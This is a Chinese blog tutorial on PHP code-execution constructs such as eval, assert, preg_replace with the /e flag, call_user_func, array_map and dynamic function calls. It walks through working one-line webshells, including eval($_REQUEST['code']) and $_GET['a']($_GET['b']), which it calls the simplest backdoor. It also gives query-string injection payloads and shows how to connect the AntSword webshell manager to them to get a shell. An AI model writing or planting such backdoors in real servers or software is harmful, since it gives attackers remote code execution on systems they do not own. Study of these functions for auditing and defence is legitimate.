PHP 危险函数2-代码执行语句

最新推荐文章于 2024-06-12 00:42:17 发布
最新推荐文章于 2024-06-12 00:42:17 发布
阅读量76 收藏
点赞数
分类专栏: PHP 文章标签: php android 开发语言 网络安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134040427
版权

代码执行语句

eval()

  • 不是函数,不能被动态调用,并且需要以 ;结束

  • 直接输出,不执行

    <?php
    $code="phpinfo();";
	echo $code;
    ?>

    image-20231025141518170

  • eval() 语句执行

    <?php
    $code="phpinfo();";
	eval($code);      // eval 不是函数,最后要加 ;
    ?>

    image-20231025141559421

  • 动态执行

    <?php
    $code=$_REQUEST["code"];
	eval($code);
    ?>

    image-20231025142152024

  • 一句话木马

    <?php
    eval($_REQUEST["code"]);
    ?>

    image-20231025165821879

    蚁剑执行命令

    image-20231025165526577

  • 其他执行方式

    ?code=phpinfo();

?code=${phpinfo()};

?code=echo abc;phpinfo();

?code=?>this is a test<?php phpinfo();

?code=eval(phpinfo());

assert()

  • 高版本中删除了 assert()

  • 使用方法

    <?php
	assert("<执行语句>");
    ?>

  • 调用系统函数

    image-20231025154512624

  • 动态调用

    <?php
    $code=$_REQUEST["code"];
	assert($code);
    ?>

    image-20231025154349691

  • 蚁剑连接

    image-20231025172351832

preg_replace()

  • 正则匹配,替换

  • 替换字符,忽略大小写

    <?php
    $code=preg_replace("/a/i","e","abAcd");
	//  "//"两个斜线中的为正则表达式,后面跟选项i,表示不区分大小写
	// 此处将 abAcd 中无论大小写的 a 全替换成 e
	echo $code;
    ?>

    image-20231025155120906

    <?php
    $code=preg_replace("/\[.*\]/i","e","[abcde]");
	//  "//"两个斜线中的未正则表达式,后面跟选项i,表示不区分大小写
	//  \ 用来进行转义
	//  .* 表示全部内容
	// 此处将 [abede] 包括中括号,替换成 e
	echo $code;
    ?>

    image-20231025155308701

    $code= preg_replace("/\[(.*)\]/i","e","[phpinfo()]");
// 匹配方括号中的任意字符序列,并将其替换为字母 "e"。所以,"[phpinfo()]" 会被替换为 "e"。最终,变量 $code 的值将是 "e"。

  • 捕获 [] 中的内容

    <?php
    $code= preg_replace("/\[(.*)\]/i","\\1","[phpinfo()]");
		\\1 第一次匹配的不明确的字符(此处为 phpinfo())


	//		\[(.*)\] 是正则表达式的模式,用于匹配方括号 [ 和 ] 之间的任意字符序列,并将其作为捕获组。
	//		\[ 匹配左方括号 [。
	//		(.*) 匹配任意字符序列,并将其作为捕获组。
	//		\] 匹配右方括号 ]。
	//		"\\1" 是替换字符串,其中 \\1 表示引用第一个捕获组的内容。
	//		将目标字符串 "[phpinfo()]" 中的方括号及其内部的任意字符序列替换为捕获组中的内容。在这个例子中,捕获组中的内容是 "phpinfo()",所以最终 $code 的值将是 "phpinfo()"。
	echo $code;
    ?>

    image-20231025163105920

  • 执行捕获的 [] 中的内容

    <?php
    $code= preg_replace("/\[(.*)\]/ie","\\1","[phpinfo()]");
    //	\\1 第一次匹配的不明确的字符(此处为 phpinfo())
    // 此处的参数 e 会将匹配出的不明确字符执行
	echo $code;
    ?>

    image-20231025163213177

回调函数

  • 可以调用其他函数的函数
  • call_user_func()、array_map()
  • eval()、isset() 等为语言结构,不是函数,不能被回调

call_user_func()

  • 使用

    <?php
	call_user_func(<调用的函数>,<要传的参数>);
    ?>


  • <?php
    $func="assert";
	$code="phpinfo()";
	call_user_func($func,$code);
    ?>

    image-20231025145510715

  • 动态执行

    <?php
    $func=$_REQUEST["func"];
	$code=$_REQUEST["code"];
	call_user_func($func,$code);
    ?>

    image-20231025145244245

    image-20231025145339107

  • 连接蚁剑

    image-20231025174346683

array_map()

  • 第二个参数必须是数组

  • 使用

    <?php
    $func=$_REQUEST["func"];
	$code[]="phpinfo()";
	array_map($func,$code);
    ?>

    image-20231025164157955

  • 动态执行

    <?php
    $func=$_REQUEST["func"];
	$code=$_REQUEST["code"];
	array_map($func,$code);
    ?>

    image-20231025174743867

动态函数

  • 在 php 中写入最简单的后门函数

    <?php
    $_GET['a']($_GET['b']);
    ?>

    访问此 php 页面

    image-20231024110739759

    修改传参,成功执行命令

    image-20231024110854862

蚁剑连接

  • eval 为一种语言结构,而非函数,不能动态调用

  • 可以将 assert 当作 a 的参数,b 的参数为一句话木马,连接蚁剑

    • 蚁剑为 POST 传参,需要将传参方式设置为 $_POST$_REQUEST

      <pre>
<?php
    $_GET['a']($_REQUEST['b']);
    ?>

  • 蚁剑连接

    输入传参后的 url

    注意

    assert 一次只能传递一个参数,传递多个参数时需要对传参进行编码

    连接密码为 $_REQUEST['b'] 中的 b

    image-20231024172526535

  • 获取 shell

    image-20231024172714987

gjl_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
后台代码-PHP危险函数
Chenamao的博客
08-10 900
目录 后台代码-PHP危险函数 1.OS命令执行函数 *PHP代码执行函数 *回调函数 *动态函数 $a($b) 扩展知识: OS命令注入漏洞 PHP代码注入 后台代码-PHP危险函数 RCE,(Remote Code\Command Execute) 1.OS命令执行函数 函数会调用系统命令,类似于 bash或者cmd,PHP会自动区分平台。 ☺ 系统命令函数,调用的是服务器命令。 ☺ PHP解释器会自动识别系统平台 ☺ 如果参数可控,就相当于shell ☺ ...
PHP危险函数总结
Lemon's blog
08-17 3820
前言:PHP中有很多危险函数,如phpinfo() ,这次就来详细总结一下PHP中的危险函数,方便以后学习。 一、PHP代码执行函数 eval()函数 定义和用法: eval() 函数把字符串按照 PHP 代码来计算. 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 这个用法就会产生漏洞,通过一个例子来看一下: <?php $var = "var"; if (isset($_GE...
PHP代码审计-PHP危险函数及特殊函数
forget_mt的博客
02-20 946
PHP代码审计-PHP危险函数及特殊函数
PHP代码审计-常见危险函数
灰蜗牛
09-20 6830
PHP代码执行函数eval & assert & preg_replace 包含函数:require、include、require_once、include_once 命令执行函数:exec、system、passthru、proc_open、shell_exec、system 文件操作函数:file、copy、file_get_contents、file_put_contents、fopen等 特殊函数
常见的 PHP 危险函数
认真走好每一小步
07-19 646
代码执行函数、命令执行函数
PHP危险函数
一个努力学习网安的小牛马
10-25 394
php的一些危险函数
php代码审计命令执行,PHP代码审计笔记--命令执行漏洞
weixin_35457696的博客
03-27 453
命令执行漏洞,用户通过浏览器在远程服务器上执行任意系统命令,严格意义上,与代码执行漏洞还是有一定的区别。0x01漏洞实例例1:$target=$_REQUEST['ip'];$cmd = shell_exec('ping '.$target);echo "{$cmd}";?>提交http://127.0.0.1/cmd.php?ip=|net user提交以后,命令变成了 shell_ex...
PHP危险函数解析:保护程序免受攻击
Sgirll的博客
06-08 838
PHP 中有一些函数是比较危险的,也是进行PHP 代码审计的时候需要重点关注的内容。
从实战理解代码执行漏洞函数php
weixin_51692662的博客
08-18 764
php,RCE,漏洞,远程代码,安全,代码执行
后端代码审计——PHP函数PHP危险函数
来日可期的博客
08-18 1214
PHP 中有一些函数是比较危险的,也是进行PHP 代码审计的时候需要重点关注的内容。
js代码-自执行函数
07-16
js代码-自执行函数
php使用PDO执行SQL语句的方法分析
10-20
主要介绍了php使用PDO执行SQL语句的方法,结合实例形式分析了PDO常用SQL函数功能及使用技巧,需要的朋友可以参考下
ThinkPHP-request函数远程代码执行1
08-03
library/think/Request.php:541-603 isGet isPost isPut isDelete isHeadpublic funct
php与mysql建立连接并执行SQL语句代码
12-30
今天写了一个小程序,很小很小,只不过是能够建立php与mysql的链接,并且实现简单的SQL语句。 新手初试,还请各路高手多多指导。 程序源代码如下: 复制代码 代码如下: <?php $conn = mysql_connect(“localhost...
三丰云免费虚拟主机和免费云服务器评测
qq_43659685的博客
06-11 439
三丰云是一家提供免费虚拟主机和免费云服务器的互联网服务提供商,通过他们的平台,用户可以免费搭建自己的网站和应用。在这篇评测文章中,我们将针对三丰云提供的免费虚拟主机和免费云服务器进行详细评测。 首先,我们来看看三丰云的免费虚拟主机服务。通过三丰云的平台,用户可以免费获取一个稳定可靠的虚拟主机空间,支持多种网站构建工具,如WordPress、Joomla等。用户可以自行选择适合自己的搭建工具,快速轻松地建立起自己的网站。而且,三丰云的免费虚拟主机还支持PHP、MySQL等多种技术,满足用户的各种需求。 接
Laravel学习-控制器
TO_Web的博客
06-09 324
意思是,在定义路由时不用定义指定方法了,他会自己找默认的方法。资源控制器,会默认把控制里的默认方法创建好。一. 创建创建控制器的命令。
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 245
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
软考初级网络管理员_07_网络单选题
最新发布
2301_80961833的博客
06-12 888
部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了169.254.0.0范围内的地址。部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了127.254.0.0范围内的地址。通过ARP协议可以获取目的端的MAC地址和UUID的地址。你必须先接入Internet,别人才可以给你发送电子邮件。只要你的E-Mai 地址有效,别人就可以给你发送电子邮件。你只有打开了自己的计算机,别人才可以给你发送电子邮件。关于虚拟局域网,下面的描述中错误的是()。
rce漏洞试试看 buuctf的pingpingping 试试ctf的rce怎么样
helloKittywz的博客
06-10 408
然后我们可以看看index.php来看这个题是过滤了哪些东西,进行总结,也了解了解。先开始我读取index.php这个文件就不能进行读取,我还以为语法出现了错误。到时候在来看看,看看\这个转义特殊字符的,也就是进行强制转换的。也就是上一条的命令的输出结果作为下一条命令的输入。分析一下过滤哪些东西,在源码中可以明确的看出,,也就是说我们要进行绕过,然后我们使用。不行的时候在试试看。直接去看看flag可以读取不?flag所以知道了flag被过滤了。ls来看看,我们来看看有哪些文件。的那篇博客中,然后我们进行。
php当中执行sql语句用什么函数
07-14
PHP执行 SQL 语句,你可以使用以下几个函数: 1. mysqli_query(): 这个函数用于执行 SQL 查询或者语句,并返回一个结果集(如果有)。它是使用 MySQLi 扩展库的函数,可以用于连接到 MySQL 数据库。 2. PDO:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值